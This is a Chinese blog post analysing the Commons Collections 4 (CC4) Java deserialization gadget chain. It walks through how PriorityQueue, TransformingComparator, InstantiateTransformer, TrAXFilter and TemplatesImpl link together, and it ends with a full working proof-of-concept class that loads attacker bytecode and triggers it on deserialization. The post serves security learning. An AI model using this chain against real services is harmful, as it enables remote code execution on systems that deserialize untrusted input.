CommonsCollections CC4链

最新推荐文章于 2024-11-03 11:01:20 发布
最新推荐文章于 2024-11-03 11:01:20 发布
阅读量392 收藏
点赞数 1
分类专栏: Java反序列化 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jy13172/article/details/131864132
版权

依赖

<dependency>
    <groupId>org.apache.commons</groupId>
    <artifactId>commons-collections4</artifactId>
    <version>4.0</version>
</dependency>

代码审计 | 原理分析

思路是CC2和CC3的结合,这里只梳理流程

  1. TrAXFilter构造器传入TemplatesImpl会调用newTransformer()
  2. InstantiateTransformer.transform()调用指定的类构造器
  3. TransformingComparator.compare()调用this.transformer.transform()
  4. PriorityQueue反序列化调用comparator.compare()

后边条链直接拿CC3的使用

 TemplatesImpl templates = new TemplatesImpl();
        Class<? extends TemplatesImpl> te = templates.getClass();

        Field namefield = te.getDeclaredField("_name");
        namefield.setAccessible(true);
        namefield.set(templates,"1");
        Field bytecodesield = te.getDeclaredField("_bytecodes");
        bytecodesield.setAccessible(true);

        byte[] code= Files.readAllBytes(Paths.get("D://tmp/Test1.class"));
        byte[][] codes={code};
        bytecodesield.set(templates,codes);//到了代码执行的地方了,需要将执行的命令传进去


        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});

        Transformer[] transformers = new Transformer[]{
            //避免被readObject修改
            new ConstantTransformer(TrAXFilter.class),
            instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
//        chainedTransformer.transform(1);

使用TransformingComparator类中的compare方法构造链条

TransformingComparator transformingComparator = new TransformingComparator<>(chainedTransformer);

        PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);

构造完成之后进行序列化反序列化操作,运行,发现什么都没发生
实际上这里我们最后要走到PriorityQueue 中的readObject方法,调用heapify()方法
我们打个断点进行查看
image.png
queuetransient修饰的
这里对queue数组中的元素进行遍历
进入heapify()方法中查看。

 private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }

我们要进入siftDown方法中
但是要满足循环条件
size >>> 1
<< 左移运算符,size << 1,相当于size乘以2

右移运算符,size >> 1,相当于size除以2

无符号右移,忽略符号位,空位都以0补齐
这里的话只要size>=2的情况下,才能有结果
image.png
所以我们需要将size的值设置为2,我们直接在priorityQueue中add 2个东西就好了

    priorityQueue.add(1);
        priorityQueue.add(2);

运行代码,报错了
报错是因为
priorityQueue.add(2);这里我们跟进add一下

    public boolean add(E e) {
        return offer(e);
    }

继续跟进offer方法
image.png
跟进siftUp方法中

 private void siftUp(int k, E x) {
        if (comparator != null)
            siftUpUsingComparator(k, x);
        else
            siftUpComparable(k, x);
    }

    @SuppressWarnings("unchecked")
    private void siftUpComparable(int k, E x) {
        Comparable<? super E> key = (Comparable<? super E>) x;
        while (k > 0) {
            int parent = (k - 1) >>> 1;
            Object e = queue[parent];
            if (key.compareTo((E) e) >= 0)
                break;
            queue[k] = e;
            k = parent;
        }
        queue[k] = key;
    }

    @SuppressWarnings("unchecked")
    private void siftUpUsingComparator(int k, E x) {
        while (k > 0) {
            int parent = (k - 1) >>> 1;
            Object e = queue[parent];
            if (comparator.compare(x, (E) e) >= 0)
                break;
            queue[k] = e;
            k = parent;
        }
        queue[k] = x;
    }

实际上在这里就调用了comparator方法,将资源消耗掉了,我们还是使用Urldns链中的思路
在它传进去之前将他的值改了
TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));

在他add完之后就值改回

Class c = transformingComparator.getClass();
        Field transformerfield = c.getDeclaredField("transformer");
        transformerfield.setAccessible(true);
        transformerfield.set(transformingComparator,chainedTransformer);

POC

package ysoserial.ay;

import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.xalan.transformer.TrAXFilter;
import org.apache.xalan.xsltc.trax.TemplatesImpl;

import javax.xml.transform.Templates;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

/**
 * @ClassName TestCC4
 * @Author aY
 * @Date 2023/3/10 12:17
 * @Description
 */
public class TestCC4 {

    public static void main(String[] args) throws Exception{
        TemplatesImpl templates = new TemplatesImpl();
        Class te = templates.getClass();

        Field namefield = te.getDeclaredField("_name");
        namefield.setAccessible(true);
        namefield.set(templates,"aaa");
        Field bytecodesield = te.getDeclaredField("_bytecodes");
        bytecodesield.setAccessible(true);

        byte[] code= Files.readAllBytes(Paths.get("D://tmp/Test1.class"));
        byte[][] codes={code};
        bytecodesield.set(templates,codes);//到了代码执行的地方了,需要将执行的命令传进去


        InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});

        Transformer[] transformers = new Transformer[]{
            //避免被readObject修改
            new ConstantTransformer(TrAXFilter.class),
            instantiateTransformer
        };
        ChainedTransformer chainedTransformer = new ChainedTransformer<>(transformers);
//        chainedTransformer.transform(1);

        TransformingComparator transformingComparator = new TransformingComparator<>(new ConstantTransformer<>(1));

        PriorityQueue priorityQueue = new PriorityQueue(transformingComparator);

        priorityQueue.add(1);
        priorityQueue.add(2);

        Class c = transformingComparator.getClass();
        Field transformerfield = c.getDeclaredField("transformer");
        transformerfield.setAccessible(true);
        transformerfield.set(transformingComparator,chainedTransformer);

        serialize(priorityQueue);
        unserialize("ser.bin");
    }


    //封装serialize
    public static void serialize(Object object) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oos.writeObject(object);
    }

    //封装unserialize
    public static Object unserialize(String Filename) throws IOException, ClassNotFoundException {
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
        Object obj = ois.readObject();
        return obj;
    }
}
YY13172
关注
专栏目录
CommonsCollections6利用分析
m0_61506558的博客
11-28 463
(一)利用(一)利用可以看到,CC6从LazyMap类开始的后半部分和CC1是相同的,只是前面没有使用类readObject()的作为反序列化的入口了,从而解决了在java 8u71 版本之后无法使用CC1的问题。CC6的前半部分和URLDNS比较像,都是利用了HashMap类在计算hash值时调用的方式,进入到方法,再到的。(二)代码分析。
CommonsCollections1利用分析
m0_61506558的博客
11-14 427
总结以图解的方式回顾一下整条的利用:第一条:从开始;调用 TransformedMap类从其父类继承回来的setValue()方法;然后调用了自身的方法;该方法调用传入的Transformer类的方法;
Commons-Collections篇-CC4分析
鸣蜩十四的博客
06-15 939
CC4中命令执行点还是一致的,可以用TransformingComparator来代替。
CC4 表排序
Laoddaaa的博客
10-15 162
CC4 表排序
【Web】Java反序列化之CC4——commons-collections4的新之二
uuzeray的博客
03-14 663
CC4就是把CC2和CC3的给拼接了一下,本质上是CC2的大体框架+CC3的TrAXFilter,基本几句话就结束了,但为了确保知识体系的完整(我要水文章),还是写一篇吧QWQ。
Java反序列化 CC4利用记录
LTianHang的博客
02-07 248
Java反序列化 CC4利用记录
CC4利用分析
07-08 799
我的Github主页同步更新,有简单的利用图。
CommonsCollections CC1
jy13172的博客
07-22 139
java反序列化漏洞
CommonsCollections CC3
jy13172的博客
07-22 653
java反序列化
CommonsCollections CC5
jy13172的博客
07-22 74
这个只是相当于提供了一个入口。后边条是CC1的子直接用。
Java安全—CommonsCollections4
Java_ttcd的博客
08-17 369
PriorityQueue是一个优先队列,作用是用来排序,重点在于每次排序都要触发传入的比较器comparator的compare()方法 在CC2中,此类用于调用PriorityQueue重写的readObject来作为触发入口。这次给大家带来的是CC4的简单分析,可以看到CC4还是没有脱离之前跟的的影子,我们可以看到CC3的前半部分以及CC2的后半部分,需要注意的问题的话就是版本问题了吧还有上面提到的一些小细节,至此CC就快跟完了。这里用到的是该类的add方法,将指定的元素插入此优先级队列。..
p牛java安全漫谈学习笔记(3)_CommonsCollections1(cc1)分析
qq_35976649的博客
04-06 4388
cc1(jdk6) 简化cc1-仿 使用p牛的简化cc1进行分析: package ysoserial.payloads; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import
CommonsCollections4利用分析
m0_61506558的博客
12-04 523
目录前言:0x01 代码分析总结一下利用:POC:完整的POC:但是在某种程度上还是换汤不换药,的最后还是用了 Transform 类对象的 方法直接去执行代码,或者是CC3的利用 TemplatesImpl 类去实现类加载执行任意代码。
HashMap为什么线程不安全?
最新发布
rnnf_yyds的博客
11-03 326
HashMap底层是基于数组 + 表(在 Java 8 以后,当表长度超过一定阈值时会转换为红黑树)的数据结构。在多线程环境下,当多个线程同时对HashMap进行put操作时,可下面这种情况:假设两个线程 A 和 B 同时执行put操作,它们计算出的插入位置相同(假设为index线程 A 先获取到了当前index位置的节点,在它还没来得及将新节点插入表(或树)时,线程 B 也获取到了这个位置的节点。
[自用,更新自day5]瑞吉外卖代码及笔记
lapiii的博客
11-01 850
当使用ThreadLocal维护变量时,ThreadLocal为每个使用该变量的线程提供独立的变量副本,所以每一个线程都可以独立地改变自己的副本,而不会影响其它线程所对应的副本。Mybatis Plus公共字段自动填充,也就是在插入或者更新的时候为指定字段赋予指定的值,使用它的好处就是可以统一对这些字段进行处理,避免了重复代码。因为在分页查询的Dish的records(菜品记录中),只有这个菜品所属的categoryId,但是我们需要分页的时候展示的是菜品名字。
服务器虚拟化
Hellc007的博客
10-30 902
服务器虚拟化是一种将物理服务器的计算资源分割为多个独立虚拟环境的技术,通过软件层将底层硬件资源抽象化并在上层构建多个虚拟机(Virtual Machine, VM)。每个虚拟机运行独立的操作系统和应用程序,相互之间不受干扰,具备类似于物理服务器的功能。这种技术使得一台物理服务器能够承担多台虚拟服务器的角色,从而极大地提升了硬件资源的利用率。服务器虚拟化的概念最早可追溯到20世纪60年代IBM大型机时代,当时虚拟化被用来将大型机的资源分配给多个任务,使得企业在有限的资源下能够同时运行多个应用。
基于vue框架的的汇生活家居商城的设计与实现bdjlq(程序+源码+数据库+调试部署+开发环境)系统界面在最后面。
h2345678的博客
10-29 1420
项目功能:商品分类,商品信息,用户。
JAVA 插入 JSON 对象到 PostgreSQL
qq_52143611的博客
10-30 925
在现代软件开发中,由于 JSON 数据的轻量和通用性,处理 JSON 数据已经变得无处不在。PostgreSQL凭借其对 JSON 的强大支持,为存储和查询 JSON 数据提供了出色的平台。为了将JSON数据保存到PostgreSQL数据库中,我们可以将JSON数据转换为PostgreSQL的JSONB类型数据,然后将其存储在数据库中。在Java中,我们可以使用JDBC或者基于ORM框架的方式来实现这一功能。
SpringSession源码分析
lkr_lkr的博客
11-01 276
默认对常规Session的理解和使用,如何使用Set-Cookie。
CommonsCollections7反序列化攻击利用深度解析
本文档主要介绍了 CommonsCollections7 中的反序列化学习,特别是针对 Hashtable 类的深入理解与POC利用。Hashtable 是 Java 集合框架中的一个重要组成部分,它实现了 Map 接口并支持 Serializable 接口,这意味着...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

YY13172

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值